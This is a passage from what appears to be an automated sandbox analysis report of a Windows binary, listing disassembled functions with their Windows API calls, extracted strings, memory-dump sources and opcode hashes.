                                                                        • Part of subcall function 00C83A3D: GetCurrentThreadId.KERNEL32 ref: 00C83A5E
                                                                        • Part of subcall function 00C83A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C825B3), ref: 00C83A65
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C825BD
                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C825DB
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C825DF
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C825E9
                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C82601
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C82605
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C8260F
                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C82623
                                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C82627
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                      • String ID:
                                                                      • API String ID: 2014098862-0
                                                                      • Opcode ID: 8b60f0044c24a9a80dac2c1e5dfdf1da568775b189d7d2aaa794c7286ff0e2ed
                                                                      • Instruction ID: 40ae556efb14eca111ccbf6d9eb20dbf36d6da401440cdbb5423888bb1a5cfd9
                                                                      • Opcode Fuzzy Hash: 8b60f0044c24a9a80dac2c1e5dfdf1da568775b189d7d2aaa794c7286ff0e2ed
                                                                      • Instruction Fuzzy Hash: 8F01BC70290610BBFB2067699CCAF9D3F59DB5EB16F100102F358AF0E1C9F224449AAA
                                                                      Function 00C81803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C81449,?,?,00000000), ref: 00C8180C
                                                                      • HeapAlloc.KERNEL32(00000000,?,00C81449,?,?,00000000), ref: 00C81813
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C81449,?,?,00000000), ref: 00C81828
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00C81449,?,?,00000000), ref: 00C81830
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00C81449,?,?,00000000), ref: 00C81833
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C81449,?,?,00000000), ref: 00C81843
                                                                      • GetCurrentProcess.KERNEL32(00C81449,00000000,?,00C81449,?,?,00000000), ref: 00C8184B
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00C81449,?,?,00000000), ref: 00C8184E
                                                                      • CreateThread.KERNEL32(00000000,00000000,00C81874,00000000,00000000,00000000), ref: 00C81868
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      • Opcode ID: ba3a6985519ce7059cc40244e91f796abc8a1126bf9a81d608339a3d01acc36f
                                                                      • Instruction ID: c7e58f9a43465c68fdf24034495d76dcfa2807b22fa1b7784328f02c2be779f6
                                                                      • Opcode Fuzzy Hash: ba3a6985519ce7059cc40244e91f796abc8a1126bf9a81d608339a3d01acc36f
                                                                      • Instruction Fuzzy Hash: 1401BFB5240304BFE710AFA5DC8DF5F3BACEB89B11F414521FA05EB1A1C6709810CB20
                                                                      Function 00C8BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C8BCFD
                                                                      • IsMenu.USER32(00000000), ref: 00C8BD1D
                                                                      • CreatePopupMenu.USER32 ref: 00C8BD53
                                                                      • GetMenuItemCount.USER32(00F54868), ref: 00C8BDA4
                                                                      • InsertMenuItemW.USER32(00F54868,?,00000001,00000030), ref: 00C8BDCC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                      • String ID: 0$2
                                                                      • API String ID: 93392585-3793063076
                                                                      • Opcode ID: 6f4e4a6a41d45ddead3b14ce12eb7347b0c532abc1c2d7bd961d424cceeb9d64
                                                                      • Instruction ID: 3de101d3e3036f6e64d2a50301c9c2d70aeeefc31850b9fff6e424b6607944ec
                                                                      • Opcode Fuzzy Hash: 6f4e4a6a41d45ddead3b14ce12eb7347b0c532abc1c2d7bd961d424cceeb9d64
                                                                      • Instruction Fuzzy Hash: 5A51A070600205EBDF20EFA9D8C4BAEBBF4BF45318F14421AF46197295D770AE45CB69
                                                                      Function 00C8C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00C8C913
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 2457776203-404129466
                                                                      • Opcode ID: 72ce99cf580c15dcb8e3bc92f7be8e03472230cac520bb337c5cdca487cb5d89
                                                                      • Instruction ID: f1efa5eba0a6b45b29a3c9c6bbc0f6fe8fc5244b51eb826c37dfb631b4a5c77c
                                                                      • Opcode Fuzzy Hash: 72ce99cf580c15dcb8e3bc92f7be8e03472230cac520bb337c5cdca487cb5d89
                                                                      • Instruction Fuzzy Hash: 45112B32689706BAA7047B159CC2DAE279CEF2536CB20007BF500A62C2E7745E40637D
                                                                      Function 00CB9F86 Relevance: 12.3, APIs: 8, Instructions: 260windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00CB9FC7
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00CB9FE7
                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00CBA224
                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00CBA242
                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00CBA263
                                                                      • ShowWindow.USER32(00000003,00000000), ref: 00CBA282
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00CBA2A7
                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00CBA2CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                      • String ID:
                                                                      • API String ID: 1211466189-0
                                                                      • Opcode ID: 5275b22d094b8cc553dc720b25528cc21dc2ee997f695ab1bb341b48fc3bb65e
                                                                      • Instruction ID: 1df0b9feaf004147c0fedb983580c88e2365516dc00d973cc334246d321b1cfc
                                                                      • Opcode Fuzzy Hash: 5275b22d094b8cc553dc720b25528cc21dc2ee997f695ab1bb341b48fc3bb65e
                                                                      • Instruction Fuzzy Hash: 5CB17931600215DBDF14CF68C9C57EE7BB2FF44711F098069ED99AB295DB31AA40CB52
                                                                      Function 00C8ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$LocalTime
                                                                      • String ID:
                                                                      • API String ID: 952045576-0
                                                                      • Opcode ID: e18a6b724dc1fffb1ae1350a55d4194a82ffd188a2c275b3e9c99370bef244ca
                                                                      • Instruction ID: 7a40bdabe331e384dd52ef5cfb12b9d20c5dae186db1634e31cd3bd1c8657882
                                                                      • Opcode Fuzzy Hash: e18a6b724dc1fffb1ae1350a55d4194a82ffd188a2c275b3e9c99370bef244ca
                                                                      • Instruction Fuzzy Hash: 51418065C1021876CB21FBB4C88AACFB7ACBF45710F508562E518F3121FB34E656D3AA
                                                                      Function 00C3F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C7682C,00000004,00000000,00000000), ref: 00C3F953
                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00C7682C,00000004,00000000,00000000), ref: 00C7F3D1
                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00C7682C,00000004,00000000,00000000), ref: 00C7F454
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: dd15b91559f3562e8af21066e60ddca2e6371ca629758afff0c5d11897d6c1f1
                                                                      • Instruction ID: 58c7a4a0aa701df1d0d58157b2ec289248fdf2ccc1cb8ac0405ef8a2c3115c17
                                                                      • Opcode Fuzzy Hash: dd15b91559f3562e8af21066e60ddca2e6371ca629758afff0c5d11897d6c1f1
                                                                      • Instruction Fuzzy Hash: 1D410D31924740BBC7358B2DC8C877E7B91AF56324F148D3CE09B56660C671AA83D751
                                                                      Function 00CB2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 00CB2D1B
                                                                      • GetDC.USER32(00000000), ref: 00CB2D23
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CB2D2E
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00CB2D3A
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00CB2D76
                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CB2D87
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CB5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00CB2DC2
                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CB2DE1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      • Opcode ID: 6a1bd92460d976b4e6b8d53ebe58826b5556d85967f0ef44718fb4a08316dc57
                                                                      • Instruction ID: c71d0bd30a13bbee39730a5068bed730f2e30956d4e561b2a6910cfd45f14afb
                                                                      • Opcode Fuzzy Hash: 6a1bd92460d976b4e6b8d53ebe58826b5556d85967f0ef44718fb4a08316dc57
                                                                      • Instruction Fuzzy Hash: 64317A72201214BFEB218F64DC8AFEB3BADEF49715F044155FE08AA291C6B59C51CBB4
                                                                      Function 00C85622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: bef7f36de8066bbe6393575b13be2d1f5e65c0c30aa53da5ac1e92a044fb8c2e
                                                                      • Instruction ID: e7fa8825f1aa7decfa2e1c48e233f09c50b3fb936d39f33be4a2e2debf4110be
                                                                      • Opcode Fuzzy Hash: bef7f36de8066bbe6393575b13be2d1f5e65c0c30aa53da5ac1e92a044fb8c2e
                                                                      • Instruction Fuzzy Hash: FA21A461650A09BBD6147A218E82FFB335CBF20399F584034FD059A781F7A1EE5193AD
                                                                      Function 00CA4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 0-572801152
                                                                      • Opcode ID: 99f752ef3ffd0372ed36af30a0c988ba6d04eb954838eb7eef63a3140b797378
                                                                      • Instruction ID: d61a21e56877c4bb47108df6e7632494c154abe8d63588842c7a8b8514707875
                                                                      • Opcode Fuzzy Hash: 99f752ef3ffd0372ed36af30a0c988ba6d04eb954838eb7eef63a3140b797378
                                                                      • Instruction Fuzzy Hash: 35D1B271A0060BAFDF10CFA8C881BAEB7B5BF49348F14C569E915AB291E770DE45CB50
                                                                      Function 00C61522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00C617FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00C615CE
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C61651
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00C617FB,?,00C617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C616E4
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C616FB
                                                                        • Part of subcall function 00C53820: RtlAllocateHeap.NTDLL(00000000,?,00CF1444,?,00C3FDF5,?,?,00C2A976,00000010,00CF1440,00C213FC,?,00C213C6,?,00C21129), ref: 00C53852
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00C617FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00C61777
                                                                      • __freea.LIBCMT ref: 00C617A2
                                                                      • __freea.LIBCMT ref: 00C617AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                      • String ID:
                                                                      • API String ID: 2829977744-0
                                                                      • Opcode ID: 14882b56a5c897c4577e5b25a147d82e669e6a625fb7954caf3b484d65d246df
                                                                      • Instruction ID: 5dc09338d0bfeac252390a12958333360c6e9e26592b31845ae39c1eeb6caed2
                                                                      • Opcode Fuzzy Hash: 14882b56a5c897c4577e5b25a147d82e669e6a625fb7954caf3b484d65d246df
                                                                      • Instruction Fuzzy Hash: 6B91AF72E002169ADB308E75C8C1AEEBBB5EF49312F1C4659EC12E7191DB35DE44DBA0
                                                                      Function 00CA4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                      • API String ID: 2610073882-625585964
                                                                      • Opcode ID: fa15fc9cb2f954bebbf74ed5f4030e457259788b9535ccad9735ad14487884cb
                                                                      • Instruction ID: 1e14d2780d22aef0f2675d75f0b83b769de82f3a099f7a56586d5f4910d8598a
                                                                      • Opcode Fuzzy Hash: fa15fc9cb2f954bebbf74ed5f4030e457259788b9535ccad9735ad14487884cb
                                                                      • Instruction Fuzzy Hash: 2A919371A00216ABDF24CFA5D884FAE77B8EF86718F108559F515EB281D7B09A41CFA0
                                                                      Function 00C91187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00C9125C
                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C91284
                                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00C912A8
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C912D8
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C9135F
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C913C4
                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00C91430
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                      • String ID:
                                                                      • API String ID: 2550207440-0
                                                                      • Opcode ID: da5990d4eefbae406c1d61df4f12738be55397f82efd1836abaad26875defbdf
                                                                      • Instruction ID: 06013543f7294e20975c4f192fe1d5af1aceb7f22a9b8eaeedb620516fb24a91
                                                                      • Opcode Fuzzy Hash: da5990d4eefbae406c1d61df4f12738be55397f82efd1836abaad26875defbdf
                                                                      • Instruction Fuzzy Hash: 7791F275A0021AAFDF00DF94C88ABBEB7B5FF44310F194429E910EB291D774EA41DB90
                                                                      Function 00C3948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: 2a359caa0e51528e68789725d87d414bf0367bba96ee7ee7471012d88899bbaf
                                                                      • Instruction ID: 25d24148f3bc6943af56a7674fc69419cae7b4bd5c87a74ef0dc406d3955c8f7
                                                                      • Opcode Fuzzy Hash: 2a359caa0e51528e68789725d87d414bf0367bba96ee7ee7471012d88899bbaf
                                                                      • Instruction Fuzzy Hash: 1F911671D00219EFCB11CFA9CC84AEEBBB8FF49320F148659E515B7251D774AA82DB60
                                                                      Function 00CB7E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsWindow.USER32(00F549A8), ref: 00CB7F37
                                                                      • IsWindowEnabled.USER32(00F549A8), ref: 00CB7F43
                                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00CB801E
                                                                      • SendMessageW.USER32(00F549A8,000000B0,?,?), ref: 00CB8051
                                                                      • IsDlgButtonChecked.USER32(?,?), ref: 00CB8089
                                                                      • GetWindowLongW.USER32(00F549A8,000000EC), ref: 00CB80AB
                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CB80C3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
